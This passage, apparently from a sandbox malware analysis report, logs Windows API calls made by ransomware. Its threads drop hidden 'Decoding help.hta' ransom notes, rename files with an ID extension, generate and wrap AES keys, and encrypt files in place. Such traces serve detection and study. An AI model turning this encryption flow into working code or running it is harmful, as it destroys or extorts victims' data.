(normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.872] FindNextFileW (in: hFindFile=0x10fbc718, lpFindFileData=0x204dfd30 | out: lpFindFileData=0x204dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.872] FindClose (in: hFindFile=0x10fbc718 | out: hFindFile=0x10fbc718) returned 1 Thread: id = 754 os_tid = 0x440 [0054.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2079fd30 | out: lpFindFileData=0x2079fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671870 [0054.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.493] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x2079fd30 | out: lpFindFileData=0x2079fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.493] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.494] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x2079fd30 | out: lpFindFileData=0x2079fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9b1b00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7c9b1b00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7c9b1b00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x554520, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.494] lstrcpyW (in: lpString1=0x97221d0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0054.494] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0054.494] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0054.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0xffffffff [0054.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xba0 [0058.386] WriteFile (in: hFile=0xba0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2079fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2079fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.386] CloseHandle (hObject=0xba0) returned 1 [0058.387] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.387] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.387] lstrlenW (lpString="cab1.cab") returned 8 [0058.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.387] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0058.387] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.387] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.387] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x2079fd30 | out: lpFindFileData=0x2079fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0058.387] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.387] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0058.387] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0058.387] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0x1 [0058.387] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeAdditional_x64.msi") returned -1 [0058.388] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0058.388] lstrcmpiW (lpString1="[ID]", lpString2=".msi") returned 1 [0058.388] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.388] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0058.388] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0058.388] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0058.388] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xba0 [0058.389] CreateFileMappingA (hFile=0xba0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xba4 [0058.389] CryptAcquireContextA (in: phProv=0x2079fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2079fcec*=0x2aac5c48) returned 1 [0060.209] CryptGenKey (in: hProv=0x2aac5c48, Algid=0x6610, dwFlags=0x1, phKey=0x2079fce8 | out: phKey=0x2079fce8*=0x5fca520) returned 1 [0060.209] CryptExportKey (in: hKey=0x5fca520, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2079fbe4, pdwDataLen=0x2079fce4 | out: pbData=0x2079fbe4*, pdwDataLen=0x2079fce4*=0x2c) returned 1 [0060.209] MapViewOfFile (hFileMappingObject=0xba4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23000) returned 0xc160000 [0065.131] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2079fbe4*, pdwDataLen=0x2079fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2079fbe4*, pdwDataLen=0x2079fcf8*=0x100) returned 1 [0065.131] CryptEncrypt (hKey=0x5fca520, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xc160000, pdwDataLen=0x2079fce4*=0x23000, dwBufLen=0x23000) Thread: id = 755 os_tid = 0x944 [0054.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*", lpFindFileData=0x20a1fd30 | out: lpFindFileData=0x20a1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db938 [0056.852] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.852] FindNextFileW (in: hFindFile=0x5db938, lpFindFileData=0x20a1fd30 | out: lpFindFileData=0x20a1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.852] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.852] FindNextFileW (in: hFindFile=0x5db938, lpFindFileData=0x20a1fd30 | out: lpFindFileData=0x20a1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.852] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*" [0056.852] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*") returned 63 [0056.852] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Decoding help.hta" [0056.852] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\decoding help.hta")) returned 0xffffffff [0056.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb60 [0058.350] WriteFile (in: hFile=0xb60, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x20a1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x20a1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.351] CloseHandle (hObject=0xb60) returned 1 [0058.351] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.351] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.351] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.351] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*" [0058.351] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*.*") returned 63 [0058.352] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" [0058.352] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" [0058.352] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb60 [0058.352] CreateFileMappingA (hFile=0xb60, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb64 [0058.353] CryptAcquireContextA (in: phProv=0x20a1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x20a1fcec*=0x2aac5918) returned 1 [0060.205] CryptGenKey (in: hProv=0x2aac5918, Algid=0x6610, dwFlags=0x1, phKey=0x20a1fce8 | out: phKey=0x20a1fce8*=0x5fca360) returned 1 [0060.205] CryptExportKey (in: hKey=0x5fca360, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x20a1fbe4, pdwDataLen=0x20a1fce4 | out: pbData=0x20a1fbe4*, pdwDataLen=0x20a1fce4*=0x2c) returned 1 [0060.205] MapViewOfFile (hFileMappingObject=0xb64, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.219] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x20a1fbe4*, pdwDataLen=0x20a1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x20a1fbe4*, pdwDataLen=0x20a1fcf8*=0x100) returned 1 [0064.219] CryptEncrypt (in: hKey=0x5fca360, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x20a1fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x20a1fce4*=0x140) returned 1 [0064.219] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.221] CloseHandle (hObject=0xb64) returned 1 [0064.221] CryptDestroyKey (hKey=0x5fca360) returned 1 [0064.221] CryptReleaseContext (hProv=0x2aac5918, dwFlags=0x0) returned 1 [0064.221] SetFilePointerEx (in: hFile=0xb60, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.221] WriteFile (hFile=0xb60, lpBuffer=0x20a1fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x20a1fcf8, lpOverlapped=0x0) Thread: id = 756 os_tid = 0x59c [0054.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*", lpFindFileData=0x20b1fd30 | out: lpFindFileData=0x20b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcad8 [0059.410] 